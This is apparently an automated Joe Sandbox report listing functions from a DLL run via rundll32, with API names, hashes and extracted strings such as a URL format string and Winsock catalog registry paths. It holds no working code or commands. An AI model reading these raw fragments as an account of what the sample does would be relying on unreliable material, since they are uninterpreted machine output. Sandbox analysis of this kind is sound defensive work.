                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$AncestorFromPointRectmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3039914759-0
                                                                                                  • Opcode ID: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
                                                                                                  • Instruction ID: 06be680ac09e87041cb82e4d3d0d5ca659cc845397dc933fd24aa54eca265516
                                                                                                  • Opcode Fuzzy Hash: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
                                                                                                  • Instruction Fuzzy Hash: 1931CD32615A4486F7E28F25DC487DA63A4FB8C7C4F449020FE5977694EF39CA99D700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180004B34 Relevance: 7.6, APIs: 5, Instructions: 82COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errnoiswspace$memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 972559988-0
                                                                                                  • Opcode ID: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
                                                                                                  • Instruction ID: aea15859d9ef88290176a7c9cabebc096ef147a52e12ca1286494642d1a9418c
                                                                                                  • Opcode Fuzzy Hash: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
                                                                                                  • Instruction Fuzzy Hash: 3531CBB3601A4886EB99DF54D9847ED33A0F788BC0F18C019EB4A0B792DF3DDA588744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180010EFC Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@$CriticalSection$Delete$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 274858031-0
                                                                                                  • Opcode ID: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
                                                                                                  • Instruction ID: d11087617417198f0cbd7eb66d5c9be171642f9dfb033e604718f16c8d919299
                                                                                                  • Opcode Fuzzy Hash: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
                                                                                                  • Instruction Fuzzy Hash: 49312A36201E88A2EB569F64E4913DDA360F7897D0F54C522EB9D437A1DF78DAA9C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180072640 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  • API String ID: 2918714741-0
                                                                                                  • Opcode ID: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
                                                                                                  • Instruction ID: a73d7fb5a67d4d67bba371cf0b3796608c1c1b370b7326418a0f08ed132aa8b6
                                                                                                  • Opcode Fuzzy Hash: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
                                                                                                  • Instruction Fuzzy Hash: D411E03270468881EAE66B25B1403DE63D0E7487E0F09A226FBAA1B7C5CE3DD5D79714
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180072700 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  • API String ID: 2918714741-0
                                                                                                  • Opcode ID: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
                                                                                                  • Instruction ID: ac3a4cfa431d0ef0eaea2260b684207aebe75cd91c02b4061f0f196fb58aac9a
                                                                                                  • Opcode Fuzzy Hash: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
                                                                                                  • Instruction Fuzzy Hash: 2611013270878881EAEA6B25B2403DE6391E7487D0F08A125BBAA0B3C5DE3DD5979304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180021380 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 416COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCurrentHandleModuleProcProcess_wtoiwcschr
                                                                                                  • String ID: DefaultIcon$SOFTWARE\Clients\
                                                                                                  • API String ID: 833562760-2446904873
                                                                                                  • Opcode ID: 414823221a86c1837642ff439834e8e89b0462007a4a3547001d189a16df377c
                                                                                                  • Instruction ID: 620cb3c04c623a8aa70c050194555e8f9deebbfdc28fef94ac7d519f34bee134
                                                                                                  • Opcode Fuzzy Hash: 414823221a86c1837642ff439834e8e89b0462007a4a3547001d189a16df377c
                                                                                                  • Instruction Fuzzy Hash: BC0272B2601A4886EB429B29C8407DD73A1FB85BF5F449312FA3D436E5DF78CA89C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800543E4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$??3@
                                                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                                                  • API String ID: 1245774677-2131870787
                                                                                                  • Opcode ID: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
                                                                                                  • Instruction ID: 67395956b14f0255dc157d00751ecdd5e79b91100998fde5bc7e771f553c8d3c
                                                                                                  • Opcode Fuzzy Hash: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
                                                                                                  • Instruction Fuzzy Hash: 5C81AFB3700B4882DE65CF15E8447E9A3A5F749BD4F54C222BA9D1B794EF7AD289C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800546E8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$??3@
                                                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                                                  • API String ID: 1245774677-2131870787
                                                                                                  • Opcode ID: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
                                                                                                  • Instruction ID: ceb8e503b58a09837b0f64c0a513370a87b020a4d694bdf072cc47396662b60f
                                                                                                  • Opcode Fuzzy Hash: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
                                                                                                  • Instruction Fuzzy Hash: 8251C47371579C82EE59CB16E5143EA6364B34DBD4F108626BEAD1BBC4DF39C2558300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000C374 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140synchronizationtimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$FileMutexReleaseSystem
                                                                                                  • String ID: %I64d$__LastModified__
                                                                                                  • API String ID: 4233779698-1650611527
                                                                                                  • Opcode ID: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
                                                                                                  • Instruction ID: 09458c959511dc8cfabe6624f5c81a29e97a68172d7e622df1c6d3cc80163a48
                                                                                                  • Opcode Fuzzy Hash: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
                                                                                                  • Instruction Fuzzy Hash: FF518D72610A0986EB96DB39C8507ED33A0FB49BE8F448321BE3A476E5DF24C649C341
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180011110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHeapOpenProcessQueryValue
                                                                                                  • String ID: dfafidjalkfjdalksjfjklfads
                                                                                                  • API String ID: 3302636555-1647371548
                                                                                                  • Opcode ID: 48f47d4bc6a301fdbed38b274010a51a5309dac9b5fb3e5a400d4c7b3d944c6d
                                                                                                  • Instruction ID: 983dc216bf69003e419ddceaeab5995bac8f8453ed4f95b95033b7c069322061
                                                                                                  • Opcode Fuzzy Hash: 48f47d4bc6a301fdbed38b274010a51a5309dac9b5fb3e5a400d4c7b3d944c6d
                                                                                                  • Instruction Fuzzy Hash: 27515F32701E488AEB55DF65D8807CD33A0F789BD8F448229EA2D47BA5DF38C619C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180048BC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcessString_vsnwprintf_smemset
                                                                                                  • String ID: com$error_code
                                                                                                  • API String ID: 3912638396-1490343999
                                                                                                  • Opcode ID: c3fc6b550fc0518e05701da538a0c891b20461f4f7683d40c3e05c31526f994e
                                                                                                  • Instruction ID: a6db5d25ead79d5040835bfd854280f02b38994ac018b834727960b236b5b414
                                                                                                  • Opcode Fuzzy Hash: c3fc6b550fc0518e05701da538a0c891b20461f4f7683d40c3e05c31526f994e
                                                                                                  • Instruction Fuzzy Hash: E351D772601D4995EB82DB25D8803DE2360FB88BD8F55C212FE2D476E9DF34CA49C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180009628 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrcmpiW.KERNEL32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800096CA
                                                                                                  • CoTaskMemFree.OLE32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800097AC
                                                                                                    • Part of subcall function 0000000180008E20: lstrcmpiW.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EAC
                                                                                                    • Part of subcall function 0000000180008E20: lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EC6
                                                                                                    • Part of subcall function 0000000180008E20: lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008F3D
                                                                                                  • CharNextW.USER32(?,?,00000002,?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000), ref: 000000018000978E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpi$CharFreeNextTask
                                                                                                  • String ID: REGISTRY
                                                                                                  • API String ID: 1985931122-194740550
                                                                                                  • Opcode ID: bb15bb951ab1659f25d1c9209306eba5976eaacf2ee56a490b216cac227807d7
                                                                                                  • Instruction ID: 0428cfaf942490d5b21421b713593470094f21aa2117f0b0ab62b3aa4edd19b5
                                                                                                  • Opcode Fuzzy Hash: bb15bb951ab1659f25d1c9209306eba5976eaacf2ee56a490b216cac227807d7
                                                                                                  • Instruction Fuzzy Hash: 0041B27271A74982FBA2DF92A9407DA72A5B78CBC4F40C021BF4947795DF79CA59C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800676F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Exception$?terminate@@RaiseThrow
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1154302961-1018135373
                                                                                                  • Opcode ID: 23d955946db4149c996ac6419d5e890f38151984662b70a56131974dc9aa4251
                                                                                                  • Instruction ID: d6fa7f134f72d8ecd5f3bcd88c47d06a78e804b5116f597576f52de847c2c671
                                                                                                  • Opcode Fuzzy Hash: 23d955946db4149c996ac6419d5e890f38151984662b70a56131974dc9aa4251
                                                                                                  • Instruction Fuzzy Hash: 5D519531614BC88DE7668F28C8453E83361FF587A8F249211FA5D07A96EF35D785C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000D00C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinmemset
                                                                                                  • String ID: http://%s/wcheckquery
                                                                                                  • API String ID: 1980634866-481256882
                                                                                                  • Opcode ID: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
                                                                                                  • Instruction ID: d06bd9b14ce5bf28a863698d63a9b65a52eeb4a283bf68ad799e7df679026a35
                                                                                                  • Opcode Fuzzy Hash: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
                                                                                                  • Instruction Fuzzy Hash: 0841A032601B4996E7A2CF64E8403DA73E4F788BA4F548125EF8957794EF3CC659C350
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800353E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinmemset
                                                                                                  • String ID: CLSID
                                                                                                  • API String ID: 1980634866-910414637
                                                                                                  • Opcode ID: 7b2e34c13297d3253356bfea7e55ba0dc334a20ed8928643ae353c0c55a14f29
                                                                                                  • Instruction ID: 03153c84c80422bb1fe0896f106c581181dc8d0379737f626a13d6e79d0fde53
                                                                                                  • Opcode Fuzzy Hash: 7b2e34c13297d3253356bfea7e55ba0dc334a20ed8928643ae353c0c55a14f29
                                                                                                  • Instruction Fuzzy Hash: FF416C36201F8995E7A38F25E8403DA73A5F7887A4F598225EA9D433A4EF38C659C350
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180042088 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: emc$mpt$nct
                                                                                                  • API String ID: 0-4018135154
                                                                                                  • Opcode ID: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
                                                                                                  • Instruction ID: 4437dbb73dbe2b615a95de1095330fd5d3d5a6b349df20e8dd5e5932057711ae
                                                                                                  • Opcode Fuzzy Hash: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
                                                                                                  • Instruction Fuzzy Hash: 00416872200B499AEB82DF71D8403DA37B0F3587D8F858912FA28976A9DF34C659C790
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005CCA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
